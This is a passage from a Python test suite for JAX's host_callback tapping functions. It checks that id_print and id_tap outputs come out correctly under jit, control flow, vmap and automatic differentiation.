    # An empty tuple and a zero-sized array are both valid tap payloads.
    hcb.id_print((), output_stream=testing_stream)
    hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        (  )
        what: second
        ( 1.00 [] )""", testing_stream.output)
  def test_tap_jit_simple(self):
    """A tap inside a jitted function is delivered."""
    jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
        2. * x, what="here", output_stream=testing_stream))
    self.assertAllClose(6. * 5., jit_fun1(5.))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        what: here
        10.00""", testing_stream.output)
  def test_tap_jit_no_invars(self):
    """Taps work in a jitted function with no inputs."""
    def func():  # jitted function does not take arguments
      return hcb.id_print(42, output_stream=testing_stream)
    self.assertAllClose(42, jax.jit(func)())
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        42""", testing_stream.output)
  def test_tap_jit_multiple_invars(self):
    """Taps work in a jitted function of several inputs."""
    def func(x1, x2):
      return hcb.id_print(x1 + x2, output_stream=testing_stream)
    self.assertAllClose(42, jax.jit(func)(40, 2))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        42""", testing_stream.output)
  def test_tap_jit_constant(self):
    """A constant tap payload under jit is delivered."""
    def func(x):
      return hcb.id_print(42, result=x, output_stream=testing_stream)
    self.assertAllClose(5, jax.jit(func)(5))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        42""", testing_stream.output)
  def test_tap_jit_sequence1(self):
    """Two data-dependent taps under jit arrive in program order."""
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
    logging.info("%s: %s", self._testMethodName,
                 jax.make_jaxpr(func)(1))
    logging.info("%s: %s", self._testMethodName,
                 jax.xla_computation(func, backend='cpu')(1).as_hlo_text())
    self.assertEqual(2, jax.jit(func)(1))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2""", testing_stream.output)
  def test_tap_jit2(self):
    """A sequence of JIT."""
    # Two invocations of the same jitted function: outputs appear in call order.
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
      return x2
    self.assertEqual(2, jax.jit(func)(1))
    self.assertEqual(11, jax.jit(func)(10))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2
        where: 1
        10
        where: 2
        11""", testing_stream.output)
  def test_tap_jit_result_unused(self):
    """We can id_print even if we don't use the result."""
    # The taps must not be dead-code-eliminated under jit.
    def func(x):
      hcb.id_print(x, where="1", output_stream=testing_stream)
      hcb.id_print(x + 1, where="2", output_stream=testing_stream)
      return x + 1
    self.assertEqual(2, jax.jit(func)(1))
    self.assertEqual(11, jax.jit(func)(10))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2
        where: 1
        10
        where: 2
        11""", testing_stream.output)
  def test_tap_jit_nested(self):
    """Taps inside a nested jit are delivered in order."""
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      def func_nested(x):
        x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
        return x2
      x3 = jax.jit(func_nested)(x1)
      return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
    self.assertEqual(3, jax.jit(func)(1))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: nested
        2
        where: 3
        3""", testing_stream.output)
  def test_tap_jit_devices(self):
    """Running on multiple devices."""
    logging.info("%s: has devices %s", self._testMethodName, local_devices())
    def func(x, device_id):
      x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
      x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
      return x2
    for d in local_devices():
      self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
    hcb.barrier_wait()
    logging.info("%s: found output %s", self._testMethodName,
                 testing_stream.output)
    # Each device must have emitted both taps exactly once.
    self.assertEqual(
        len(local_devices()), len(re.findall(r"111", testing_stream.output)))
    self.assertEqual(
        len(local_devices()), len(re.findall(r"112", testing_stream.output)))
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(
              testcase_name=f"_with_jit_{with_jit}",
              with_jit=with_jit)
          for with_jit in [True, False]))
  def test_tap_pytree(self, with_jit=False):
    """id_tap preserves several pytree shapes, with and without jit."""
    def func(x, what=""):
      """Returns some pytrees depending on x"""
      if what == "pair_1_x":
        return (1, x)
      elif what == "pair_x_2x":
        return (x, 2 * x)
      elif what == "dict":
        return dict(a=2 * x, b=3 * x)
      else:
        assert False
    tap_count = 0
    def tap_func(a, _, *, what=""):
      nonlocal tap_count
      tap_count += 1
      # The tapped value must match the untransformed pytree.
      self.assertEqual(func(5, what), a)
    transform = jax.jit if with_jit else lambda f: f
    for what in ("pair_1_x", "pair_x_2x", "dict"):
      transformed = transform(
          lambda x: hcb.id_tap(
              partial(tap_func, what=what),
              func(x, what),
              result=func(x * 2, what))
      )(5)
      self.assertEqual(func(10, what), transformed)
    hcb.barrier_wait()  # Wait for receivers to be done
    self.assertEqual(3, tap_count)
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(
              testcase_name=f"_concurrent_{concurrent}",
              concurrent=concurrent)
          for concurrent in [True, False]))
  def test_tap_multiple(self, concurrent=False):
    """Call id_tap multiple times, concurrently or in sequence. """
    if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
      # TODO(necula): if there is device side concurrency, outfeeds from
      # different computations can be interleaved. For example, it seems that
      # on GPU if multiple host threads run a jit computation, the multiple
      # computations are interleaved on the GPU. This can result in the outfeed
      # trains being interleaved, which will trigger an error.
      # The solution is to fix on GPU the receiving logic so that we can outfeed
      # the train as one tuple, and receive it one piece as a time. Then the
      # trains should be atomic.
      # See also b/160692602.
      raise SkipTest("concurrent id_tap not supported on CPU, GPU")
    received = set()
    count = 5
    def pause_tap(idx, _):
      received.add(int(idx))
      logging.info("Starting do_tap %s. Sleeping 1sec ...", idx)
      time.sleep(0.3)
      logging.info("Finish do_tap %s", idx)
    def do_tap(idx):
      jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
    if concurrent:
      threads = [
          threading.Thread(
              name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
          for idx in range(count)
      ]
      [t.start() for t in threads]
      [t.join() for t in threads]
    else:
      for idx in range(count):
        do_tap(idx)
    hcb.barrier_wait()
    # Every index must have been tapped exactly once, in any order.
    self.assertEqual(received, set(range(count)))
  # TODO(necula): see comment for test_multiple_tap. Here we disable also
  # on TPU, because the barrier_wait runs on all devices, including on the CPU
  # where it would run into concurrency problems.
  @skip("Concurrency not supported")
  def test_tap_multiple_barriers(self):
    """Call barrier_wait concurrently."""
    def pause_tap(*args, **kwargs):
      logging.info("pause_tap waiting")
      time.sleep(0.3)
      logging.info("pause_tap done")
    def long_run(x):
      return hcb.id_tap(pause_tap, x)
    jax.jit(long_run)(5.)
    def try_barrier(idx):
      logging.info("Starting test barrier %s", idx)
      hcb.barrier_wait()
      logging.info("Finished test barrier %s", idx)
    # Three threads racing on barrier_wait.
    threads = [
        threading.Thread(
            name=f"barrier_{idx}", target=try_barrier, args=(idx,))
        for idx in range(3)
    ]
    [t.start() for t in threads]
    [t.join() for t in threads]
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(
              testcase_name=f"_with_jit_{with_jit}",
              with_jit=with_jit)
          for with_jit in [True, False]))
  def test_tap_cond(self, with_jit=False):
    """A conditional"""
    # Taps in both branches of lax.cond; only the taken branch emits.
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
      x4 = lax.cond(x % 2 == 0,
                    lambda x: hcb.id_print(x, where="cond_t",
                                           output_stream=testing_stream),
                    lambda x: hcb.id_print(-1, where="cond_f", result=x,
                                           output_stream=testing_stream),
                    x2 + 1)
      x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
      return x5
    transform = jax.jit if with_jit else lambda f: f
    self.assertEqual(4, transform(func)(1))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2
        where: cond_f
        -1
        where: end
        4""", testing_stream.output)
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(testcase_name=f"_with_jit_{with_jit}",
               with_jit=with_jit)
          for with_jit in [True, False]))
  def test_tap_while_cond(self, with_jit=False):
    """Taps inside a while_loop body containing a cond."""
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
      def body(x):
        x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
        x4 = lax.cond(x % 2 == 0,
                      lambda x: hcb.id_print(x, where="w_b_t",
                                             output_stream=testing_stream),
                      lambda x: hcb.id_print(-1, where="w_b_f",
                                             result=x, output_stream=testing_stream),
                      x3 + 1)
        return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
      x10 = lax.while_loop(lambda x: x <= 3, body, x2)
      res = hcb.id_print(x10, where="end", output_stream=testing_stream)
      return res
    transform = jax.jit if with_jit else lambda f: f
    self.assertEqual(4, transform(func)(1))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2
        where: w_b_1
        2
        where: w_b_t
        3
        where: w_b_2
        3
        where: w_b_1
        3
        where: w_b_f
        -1
        where: w_b_2
        4
        where: end
        4""", testing_stream.output)
  def test_tap_jit_while_pred_tap(self):
    """While with printing in the conditional."""
    # The predicate tap fires once per loop-condition evaluation (3 times).
    def func(x):
      x1 = hcb.id_print(x, where="1")
      x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
                                                  where="w_p",
                                                  output_stream=testing_stream),
                           lambda x: hcb.id_print(x + 1, where="w_b",
                                                  output_stream=testing_stream),
                           x1)
      res = hcb.id_print(x10, where="3", output_stream=testing_stream)
      return res
    self.assertEqual(3, jax.jit(func)(1))
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self,
                                 """
        where: w_p
        True
        where: w_b
        2
        where: w_p
        True
        where: w_b
        3
        where: w_p
        False
        where: 3
        3""", testing_stream.output)
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(
              testcase_name=f"_with_jit_{with_jit}",
              with_jit=with_jit)
          for with_jit in [True, False]))
  def test_tap_scan_cond(self, with_jit=True):
    """Taps inside a scan body containing a cond."""
    def func(x):
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
      def body(c, x):
        x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
        x4 = lax.cond(x % 2 == 0,
                      lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
                      lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
                      x3 + 1)
        return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
      _, x10 = lax.scan(body, x2, jnp.arange(3))
      res = hcb.id_print(x10, where="10", output_stream=testing_stream)
      return res
    if with_jit:
      func = jax.jit(func)
    res = func(1)
    self.assertAllClose(jnp.array([1, 2, 3]), res)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        where: 1
        1
        where: 2
        2
        where: s_1
        0
        where: s_t
        1
        where: s_2
        1
        where: s_1
        1
        where: s_f
        -1
        where: s_2
        2
        where: s_1
        2
        where: s_t
        3
        where: s_2
        3
        where: 10
        [1 2 3]""", testing_stream.output)
    testing_stream.reset()
  @parameterized.named_parameters(
      jtu.cases_from_list(
          dict(
              testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
              shape=shape,
              dtype=dtype,
              nr_args=nr_args) for nr_args in [1, 2]
          for shape in [(), (2,), (2, 3), (2, 3, 4)]
          for dtype in jtu.dtypes.all))
  def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
    """id_print round-trips arrays of many dtypes and shapes under jit."""
    if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
      raise SkipTest(f"host_callback not implemented for {dtype}.")
    # NOTE(review): this branch looks unreachable — jnp.bool_ aliases
    # np.bool_ and is skipped above. Confirm before removing.
    if dtype == np.bool_:
      args = [self.rng().choice(a=[True, False], size=shape)]
    else:
      args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
    if nr_args > 1:
      args = args * nr_args
    jit_fun1 = jax.jit(lambda xs: hcb.id_print(
        xs,
        a_new_test="************",
        testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
    res = jit_fun1(args)
    self.assertAllClose(args, res, check_dtypes=True)
  def test_tap_jit_large(self):
    """A large (10000-element) payload can be tapped under jit."""
    arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
    jax.jit(hcb.id_print)(arg)
  def test_tap_jit_several_together(self):
    """Several arrays of different shapes can be tapped in one id_print."""
    arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
    jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
  def test_tap_jit_interleaving(self):
    # Several jit's without data dependencies; they may interfere
    count = 0  # Count tap invocations
    nr_arrays = 5
    def tap_func(arg, _):
      nonlocal count
      assert len(arg) == nr_arrays
      count += 1
    # This is the function that we'll run multiple times
    def func(x, count):
      for i in range(count):
        x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
      return x
    x = jnp.array(1, dtype=np.int32)
    res = 0
    for _ in range(10):
      # No dependencies between the jit invocations
      res += jax.jit(lambda x: func(x, 10))(x)
    hcb.barrier_wait()
    # 10 invocations x 10 taps each = 100 tap callbacks.
    self.assertEqual(100, count)
  def test_tap_jit_tap_exception(self):
    """A tap exception under jit is raised at barrier_wait, not at call time."""
    if not FLAGS.jax_host_callback_outfeed:
      raise SkipTest("TODO: implement error handling for customcall")
    # Simulate a tap error
    def tap_err(*args, **kwargs):
      raise NotImplementedError
    def func(x):
      x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
      x2 = hcb.id_tap(tap_err, x1 + 1)
      x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
      return x3
    res = jax.jit(func)(0)  # No error yet
    with self.assertRaises(hcb.CallbackException):
      hcb.barrier_wait()
    # Even though the receiver thread raised, the main thread should still
    # return 3.
    self.assertEqual(3, res)
    # We should have received all others
    assertMultiLineStrippedEqual(self, """
        what: x1
        1
        what: x3
        3""", testing_stream.output)
  def test_tap_while(self):
    """Executing while, even without JIT uses compiled code"""
    y = jnp.ones(5)  # captured const
    def func(x):
      return lax.while_loop(
          lambda c: c[1] < 5,
          lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
          (x, 1))
    func(y)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        1
        2
        3
        4""", testing_stream.output)
  def test_tap_jvp(self):
    """Tap behavior under jax.jvp depends on the ad_transforms flag: with it,
    tangents are tapped alongside primals; without it, only primals."""
    jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
    res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
    self.assertAllClose(100., res_primals, check_dtypes=False)
    self.assertAllClose(4., res_tangents, check_dtypes=False)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          transforms: ['jvp'] what: a * 2
          ( 10.00 0.20 )
          transforms: ['jvp'] what: y * 3
          ( 30.00 0.60 )""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: a * 2
          10.00
          what: y * 3
          30.00""", testing_stream.output)
  def test_tap_grad_primal_unused(self):
    # The output of id_print is not needed for backwards pass
    def func(x):
      return 2. * hcb.id_print(x * 3., what="x * 3",
                               output_stream=testing_stream)
    grad_func = jax.grad(func)
    arg = jnp.float32(5.)
    jaxpr = str(jax.make_jaxpr(grad_func)(arg))
    # making the Jaxpr does not print anything
    hcb.barrier_wait()
    treedef = tree_util.tree_structure(arg)
    # With ad transforms the transposed tap stays in the jaxpr; without, the
    # backward pass contains no outside_call.
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, f"""
        {{ lambda ; a:f32[]. let
            b:f32[] = mul a 3.00
            c:f32[] = outside_call[
              arg_treedef={treedef}
              callback=...
              identity=True
              transforms=()
            ] b
            _:f32[] = mul c 2.00
            d:f32[] = mul 1.00 2.00
            e:f32[] = outside_call[
              arg_treedef={treedef}
              callback=...
              identity=True
              transforms=(('jvp',), ('transpose',))
            ] d
            f:f32[] = mul e 3.00
          in (f,) }}""", jaxpr)
    else:
      assertMultiLineStrippedEqual(self, f"""
        {{ lambda ; a:f32[]. let
            b:f32[] = mul a 3.00
            c:f32[] = outside_call[
              arg_treedef={treedef}
              callback=...
              identity=True
            ] b
            _:f32[] = mul c 2.00
            d:f32[] = mul 1.00 2.00
            e:f32[] = mul d 3.00
          in (e,) }}""", jaxpr)
    assertMultiLineStrippedEqual(self, "", testing_stream.output)
    testing_stream.reset()
    res_grad = grad_func(arg)
    hcb.barrier_wait()
    self.assertAllClose(6., res_grad, check_dtypes=False)
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          what: x * 3
          15.00
          transforms: ['jvp', 'transpose'] what: x * 3
          2.00""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: x * 3
          15.00""", testing_stream.output)
  def test_tap_grad_simple(self):
    """Taps whose outputs feed the backward pass; cotangents are tapped only
    under the ad_transforms flag."""
    def func(x):
      y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
      return x * hcb.id_print(y * 3., what="y * 3",
                              output_stream=testing_stream)
    grad_func = jax.grad(func)
    res_grad = grad_func(jnp.float32(5.))
    self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          what: x * 2
          10.00
          what: y * 3
          30.00
          transforms: ['jvp', 'transpose'] what: y * 3
          5.00
          transforms: ['jvp', 'transpose'] what: x * 2
          15.00""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: x * 2
          10.00
          what: y * 3
          30.00""", testing_stream.output)
  def test_tap_grad_grad(self):
    """Second-order grad: nested transpose taps appear only with ad_transforms."""
    def func(x):
      y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
      return x * (y * 3.)
    grad_func = jax.grad(jax.grad(func))
    # making the Jaxpr does not print anything
    _ = jax.make_jaxpr(grad_func)(5.)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, "", testing_stream.output)
    res_grad = grad_func(jnp.float32(5.))
    self.assertAllClose(12., res_grad, check_dtypes=False)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          what: x * 2
          10.00
          transforms: ['jvp', 'transpose'] what: x * 2
          15.00
          transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
          2.00
          transforms: ['jvp', 'transpose'] what: x * 2
          3.00""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: x * 2
          10.00""", testing_stream.output)
  def test_tap_grad_pytree(self):
    """grad through an id_print of a pytree with a separate result= payload."""
    def func(x):
      x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
                            result=(x * 4., x * 5.),
                            output_stream=testing_stream)
      return x4 + 2. * x5
    x = jnp.float32(5.)
    grad_func = jax.grad(func)
    print(jax.make_jaxpr(grad_func)(x))
    res_grad = grad_func(x)
    self.assertAllClose(14., res_grad, check_dtypes=False)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          what: pair
          ( 10.00 15.00 )
          transforms: ['jvp', 'transpose'] what: pair
          ( 0.00 0.00 )""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: pair
          ( 10.00 15.00 )""", testing_stream.output)
  def test_tap_jvp_float0(self):
    """jvp through id_tap with a float0 tangent (for the int argument)."""
    def f(x, yint):
      x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
      return x * yint
    res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
    self.assertAllClose((6., 0.6), res)
  def test_tap_grad_float0(self):
    """grad through id_print of a (float, int) pair; the int gets a float0
    cotangent."""
    def func(x, yint):
      x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
      return x * yint
    grad_func = jax.grad(func)
    res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
    self.assertAllClose(2., res_grad, check_dtypes=False)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          what: pair
          ( 5.00 2 )
          transforms: ['jvp', 'transpose'] what: pair
          ( 2.00 False )""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          what: pair
          ( 5.00 2 )""", testing_stream.output)
  def test_tap_grad_float0_result(self):
    # https://github.com/google/jax/issues/7340
    # x is a Tuple[f32[2], s32[3]]
    x = (np.array([.7, .8], dtype=np.float32),
         np.array([11, 12, 13], dtype=np.int32))
    def f_jax(x):
      x = hcb.id_print(x, result=x, output_stream=testing_stream)  # result= is important
      return (3. * x[0], x[1])
    def f_jax_vjp(x):
      res, pullback = jax.vjp(f_jax, x)
      # The integer output gets a float0 cotangent.
      g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
                     np.zeros(x[1].shape, dtype=dtypes.float0)))
      return g
    g = f_jax_vjp(x)
    self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
    self.assertEqual(dtypes.float0, g[1].dtype)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          ( [0.70 0.80] [11 12 13] )
          transforms: ['jvp', 'transpose']
          ( [0.00 0.00] [False False False] )""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          ( [0.70 0.80] [11 12 13] )""", testing_stream.output)
  def test_tap_higher_order_grad_float0_result(self):
    # https://github.com/google/jax/issues/7340
    # x is a Tuple[f32[2], s32[3]]
    x = (np.array([.7, .8], dtype=np.float32),
         np.array([11, 12, 13], dtype=np.int32))
    def f_jax(x):
      x = hcb.id_print(x, result=x, output_stream=testing_stream)  # result= is important
      return (jnp.sin(x[0]), x[1])
    def wrap_vjp(f, args, res_f_of_args):
      # Given a function "f" and "args" return the f_vjp and args_vjp
      def make_ct(res):
        res_dtype = np.result_type(res)
        if res_dtype == dtypes.float0:
          return res
        ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
        return np.ones(np.shape(res), dtype=ct_dtype)
      cts = tree_util.tree_map(make_ct, res_f_of_args)
      def f_vjp(args, cts):
        res, pullback = jax.vjp(f, *args)
        return pullback(cts)
      return (f_vjp, (args, cts))
    res = f_jax(x)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        ( [0.70 0.80] [11 12 13] )""", testing_stream.output)
    testing_stream.reset()
    # 1st order
    f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
    res_vjp1 = f_jax_vjp1(*args_vjp1)
    hcb.barrier_wait()
    if FLAGS.jax_host_callback_ad_transforms:
      assertMultiLineStrippedEqual(self, """
          ( [0.70 0.80] [11 12 13] )
          transforms: ['jvp', 'transpose']
          ( [0.00 0.00] [False False False] )""", testing_stream.output)
    else:
      assertMultiLineStrippedEqual(self, """
          ( [0.70 0.80] [11 12 13] )""", testing_stream.output)
    testing_stream.reset()
    # 2nd order
    f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
    res_vjp2 = f_jax_vjp2(*args_vjp2)
    # 3rd order — just check it does not crash.
    f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
    _ = f_jax_vjp3(*args_vjp3)
  def test_tap_vmap(self):
    """vmap of a tapped function records the batch transform and batched values."""
    vmap_fun1 = jax.vmap(fun1)
    vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
    vmap_fun1(vargs)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
        [ 8.00 10.00]
        transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
        [24.00 30.00]""", testing_stream.output)
  def test_tap_vmap_not_batched(self):
    """Unbatched closure values show batch_dim None in the transform record."""
    x = 3.
    def func(y):
      # x is not mapped, y is mapped
      _, y = hcb.id_print((x, y), output_stream=testing_stream)
      return x + y
    vmap_func = jax.vmap(func)
    vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
    _ = vmap_func(vargs)
    hcb.barrier_wait()
    assertMultiLineStrippedEqual(self, """
        transforms: [('batch', {'batch_dims': (None, 0)})]
        ( 3.00 [4.00 5.00] )""", testing_stream.output)
  def test_tap_vmap_vmap(self):
    # A 2D tensor with x[i, j] = i + j using 2 vmap
    def sum(x, y):
      return hcb.id_print(x + y, output_stream=testing_stream)
    def sum_rows(xv, y):
      return jax.vmap(sum, in_axes=(0, None))(xv, y)
    def sum_all(xv, yv):
      return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
    xv = jnp.arange(5, dtype=np.int32)
    yv = jnp.arange(3, dtype=np.int32)
    # assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
    _ = sum_all(xv, yv)
    hcb.barrier_wait()
    # Both nested batch transforms are recorded in the tap.
    assertMultiLineStrippedEqual(self, """
        transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
        [[0 1 2 3 4]
        [1 2 3 4 5]
        [2 3 4 5 6]]""", testing_stream.output)
  def test_tap_vmap_while(self):
    """Vmap of while."""
    def func(x):
      # like max(x, 2)
      x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
      x2 = lax.while_loop(
          lambda x: x < 2, lambda x: hcb.id_print(
              x + 1, where="body:x+1", output_stream=testing_stream), x1)
      res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
      return res
    inputs = np.arange(5, dtype=np.int32)
    self.assertAllClose(
        np.array([2, 2, 2, 3, 4]),
        jax.jit(jax.vmap(func))(inputs),
        check_dtypes=False)
    hcb.barrier_wait()
    # The batched while runs until all lanes are done; already-done lanes keep
    # their values.
    assertMultiLineStrippedEqual(
        self, """
        transforms: [('batch', {'batch_dims': (0,)})] where: before:x
        [0 1 2 3 4]
        transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
        [1 2 3 4 5]
        transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
        [2 3 3 4 5]
        transforms: [('batch', {'batch_dims': (0,)})] where: after:x
        [2 2 2 3 4]""", testing_stream.output)
  def test_tap_vmap_while_tap_cond(self):
    """Vmap of while, with a tap in the conditional."""
    def func(x):
      # like max(x, 2)
      x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
      x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
                                                 output_stream=testing_stream),
                          lambda x: hcb.id_print(x + 1, where="w_b",
                                                 output_stream=testing_stream),
                          x1)
      res = hcb.id_print(x2, where="3", output_stream=testing_stream)
      return res
    inputs = np.arange(5, dtype=np.int32)
    res = jax.jit(jax.vmap(func))(inputs)
    hcb.barrier_wait()
    self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
    # The predicate tap shows the per-lane condition on each iteration.
    assertMultiLineStrippedEqual(self, """
        transforms: [('batch', {'batch_dims': (0,)})] where: 1
        [0 1 2 3 4]
        transforms: [('batch', {'batch_dims': (0,)})] where: w_c
        [ True  True False False False]
        transforms: [('batch', {'batch_dims': (0,)})] where: w_b
        [1 2 3 4 5]
        transforms: [('batch', {'batch_dims': (0,)})] where: w_c
        [ True False False False False]
        transforms: [('batch', {'batch_dims': (0,)})] where: w_b
        [2 3 3 4 5]
        transforms: [('batch', {'batch_dims': (0,)})] where: w_c
        [False False False False False]
        transforms: [('batch', {'batch_dims': (0,)})] where: 3
        [2 2 2 3 4]""", testing_stream.output)
  def test_tap_transforms_old_doc(self):
    """Documentation examples for the old (ad_transforms) tap behavior."""
    if not FLAGS.jax_host_callback_ad_transforms:
      raise unittest.SkipTest("disabled for new behavior")
    # Examples from the documentation
    def power3(x):
      y = x * x
      # Print both 'x' and 'x^2'. Must pack as a tuple.
      _, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
      return y * x
    print(f"impl = {power3(3.)}")
    hcb.barrier_wait()
    expected = """
        what: x,x^2
       ( 3. 9. )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()
    print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
    hcb.barrier_wait()
    expected = """
        transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
        ( [0. 1. 2.] [0. 1. 4.] )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()
    print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
    hcb.barrier_wait()
    expected = """
        transforms: ['jvp'] what: x,x^2
        ( ( 3. 9. ) ( 0.1 0.6 ) )"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)
    testing_stream.reset()
    print(f"grad = {jax.grad(power3)(3.)}")
